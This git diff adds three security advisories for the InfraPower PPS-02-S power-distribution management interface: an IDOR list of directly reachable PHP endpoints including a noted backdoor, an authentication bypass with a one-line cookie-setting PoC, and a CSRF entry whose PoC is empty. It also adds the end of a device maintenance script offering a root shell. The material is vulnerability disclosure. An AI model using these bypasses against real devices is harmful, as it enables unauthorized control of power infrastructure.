+if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
+cat /mnt/mtd/log_memCheck.txt
+fi
+;;
+"R")
+echo "(R) Reboot "
+echo -n "Are you sure to continue? [y/n]:"
+read ansR
+if [ "$ansR" == "y" ]; then
+echo "Rebooting..."
+reboot
+fi
+;;
+"X")
+echo "su mode started!"
+su
+;;
+"Q")
+echo "Leaving maintenance mode........OK"
+exit 0
+;;
+esac
+done
diff --git a/platforms/php/webapps/40644.txt b/platforms/php/webapps/40644.txt
new file mode 100755
index 000000000..c200cf1f2
--- /dev/null
+++ b/platforms/php/webapps/40644.txt
@@ -0,0 +1,54 @@
+InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: Insecure Direct Object References occur when an application
+provides direct access to objects based on user-supplied input. As
+a result of this vulnerability attackers can bypass authorization
+and access resources and functionalities in the system directly, for
+example APIs, files, upload utilities, device settings, etc.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5373
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
+
+
+27.09.2016
+
+--
+
+
+GET /ConnPort.php
+GET /CSSSource.php
+GET /dball.php
+GET /doupgrate.php
+GET /IPSettings.php
+GET /ListFile.php
+GET /Menu.php
+GET /Ntp.php
+GET /PDUDetails_Ajax_Details.php
+GET /PDULog.php
+GET /PortSettings.php
+GET /production_test1.php ("backdoor")
+GET /UploadEXE.php
diff --git a/platforms/php/webapps/40645.txt b/platforms/php/webapps/40645.txt
new file mode 100755
index 000000000..af27bb43b
--- /dev/null
+++ b/platforms/php/webapps/40645.txt
@@ -0,0 +1,142 @@
+InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: The device does not properly perform authentication, allowing
+it to be bypassed through cookie manipulation. The vulnerable function
+checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
+or not, allowing easy bypass of the user security mechanisms.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5374
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
+
+
+27.09.2016
+
+--
+
+
+(example) System.php:
+---------------------
+1: init($_SESSION['ite']);
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
+/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);
+
+➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
+/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
+/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
+/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())
+
+
+PoC:
+
+javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
+
+--
diff --git a/platforms/php/webapps/40646.txt b/platforms/php/webapps/40646.txt
new file mode 100755
index 000000000..a38ac4923
--- /dev/null
+++ b/platforms/php/webapps/40646.txt
@@ -0,0 +1,53 @@
+InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with admin
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5375
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php
+
+
+27.09.2016
+
+--
+
+
+PoC:
+
+
+